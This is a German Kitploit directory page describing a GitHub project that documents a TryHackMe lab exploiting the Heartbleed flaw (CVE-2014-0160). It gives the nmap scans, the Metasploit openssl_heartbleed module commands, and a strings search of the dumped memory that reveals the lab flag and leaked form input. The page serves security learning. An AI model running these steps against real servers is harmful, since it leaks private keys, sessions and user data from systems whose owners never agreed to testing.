Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Project-Field-Analysis-and-Memory-Leak-Demonstration — Das Ziel dieses Projekts war es, einen entfernten Host auf die Heartbleed-Sicherheitslücke (CVE-2014-0160) zu überprüfen, deren Vorhandensein zu bestätigen und sie auszunutzen, um potenziell sensible Informationen aus dem Serverspeicher über das TLS-Protokoll zu extrahieren. | Kitploit
Tools/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
SpeicherforensikSchwachstellenanalyseExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

Das Ziel dieses Projekts war es, einen entfernten Host auf die Heartbleed-Sicherheitslücke (CVE-2014-0160) zu überprüfen, deren Vorhandensein zu bestätigen und sie auszunutzen, um potenziell sensible Informationen aus dem Serverspeicher über das TLS-Protokoll zu extrahieren.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
15vor 1 JahrNoch nicht geprüft

Zielsetzung

Das Ziel dieses Projekts war es, einen entfernten Host auf die Heartbleed-Schwachstelle (CVE-2014-0160) zu überprüfen, deren Vorhandensein zu bestätigen und sie auszunutzen, um potenziell sensible Informationen aus dem Serverspeicher über das TLS-Protokoll zu extrahieren.

Ausführung

  1. Identifizierung offener Dienste (Nmap)

    nmap -sC -sV 52.215.184.158
    

    Ergebnis:

    PORT    STATE SERVICE  VERSION
    22/tcp  open  ssh      OpenSSH 7.4
    111/tcp open  rpcbind  2-4
    443/tcp open  ssl/http nginx 1.15.7
    
    | ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK
    | Not valid before: 2019-02-16T10:41:14
    | Not valid after:  2020-02-16T10:41:14
    

    Das TLS-Zertifikat war selbstsigniert und abgelaufen. Dies legte den Verdacht nahe, dass die OpenSSL-Version veraltet sein könnte. Zielport: 443.

  2. Heartbleed-Schwachstellenprüfung (Nmap-Skript)

    nmap -p 443 --script ssl-heartbleed 52.215.184.158
    

    Ergebnis:

    | ssl-heartbleed:
    |   VULNERABLE:
    |     OpenSSL 1.0.1 is vulnerable to Heartbleed
    |     State: VULNERABLE
    |     Risk factor: High
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
    

    Das Ziel bestätigt sich als anfällig für Heartbleed.

  3. Ausnutzung (Metasploit Framework)

    msfconsole
    use auxiliary/scanner/ssl/openssl_heartbleed
    set RHOSTS 52.215.184.158
    run
    

    Ergebnis:

    [+] Heartbeat response with leak, 44883 bytes
    [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin
    

    Der Speicher wurde erfolgreich ausgelesen und lokal zur Analyse gespeichert.

  4. Analyse des Speicherauszugs

    strings openssl.heartble_152689.bin | grep -i "THM{"
    

    Ergebnis:

    user_name=hacker101&[email protected]&user_message=THM{sSl-Is-BaD}
    

    Vertrauliche Daten, einschließlich eines Anwendungsflags, wurden erfolgreich aus dem TLS-Speicher extrahiert – was bestätigt, dass die Schwachstelle praktisch ausgenutzt werden kann, um sensible Informationen preiszugeben.

Schlussfolgerung

Ich habe CVE-2014-0160 erfolgreich auf einem entfernten Server identifiziert und ausgenutzt. Der Prozess umfasste:

  • Erkennung der Schwachstelle mit nmap
  • Ausnutzung des Fehlers mit Metasploit
  • Extrahieren von live eingegebenen Benutzerdaten (einschließlich des Flags THM{sSl-Is-BaD}) aus dem Speicher

Geschäftliche Auswirkungen

Das Vorhandensein von Heartbleed in einem öffentlich zugänglichen System birgt ein kritisches Risiko:

  • Mögliches Leck von TLS-Private-Keys
  • Session-Hijacking
  • Offenlegung von Benutzernamen, E-Mails und sensiblen Benutzereingaben
Tool herunterladen